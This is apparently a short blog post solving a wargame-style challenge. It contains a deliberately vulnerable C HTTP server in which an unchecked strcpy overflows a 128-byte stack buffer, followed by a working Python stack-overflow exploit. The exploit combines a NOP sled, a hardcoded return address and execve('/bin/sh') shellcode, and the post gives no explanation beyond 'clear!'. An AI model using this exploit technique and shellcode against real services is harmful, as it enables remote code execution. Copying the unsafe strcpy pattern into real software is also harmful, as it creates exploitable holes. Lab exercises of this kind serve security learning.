#include "../common/common.c"
int fix_path(char *path)
{
char resolved[128];
if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open
strcpy(path, resolved);
}
char *parse_http_request()
{
char buffer[1024];
char *path;
char *q;
printf("[debug] buffer is at 0x%08x :-)\n", buffer);
if(read(0, buffer, sizeof(buffer)) <= 0) errx(0, "Failed to read from remote host"); //if nothing
if(memcmp(buffer, "GET ", 4) != 0) errx(0, "Not a GET request"); //if not "GET "
path = &buffer[4];
q = strchr(path, ' ');
if(! q) errx(0, "No protocol version specified");
*q++ = 0;
if(strncmp(q, "HTTP/1.1", 8) != 0) errx(0, "Invalid protocol");
fix_path(path);
printf("trying to access %s\n", path);
return path;
}
int main(int argc, char **argv, char **envp)
{
int fd;
char *p;
background_process(NAME, UID, GID);
fd = serve_forever(PORT);
set_io(fd);
parse_http_request();
}
exploit source
#!/usr/bin/python
from struct import *
p = lambda x : pack("<L",x)
shellcode = "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73" +\
"\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x08\x00\x00" +\
"\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x53\x89\xe1\xcd" +\
"\x80"
ret = 0xbf999288
payload = ""
payload += "GET "
payload += "\x90"*139
payload += p(ret)
payload += " HTTP/1.1 "
payload += "\x90"*50
payload += shellcode
print payload
clear!
댓글 없음:
댓글 쓰기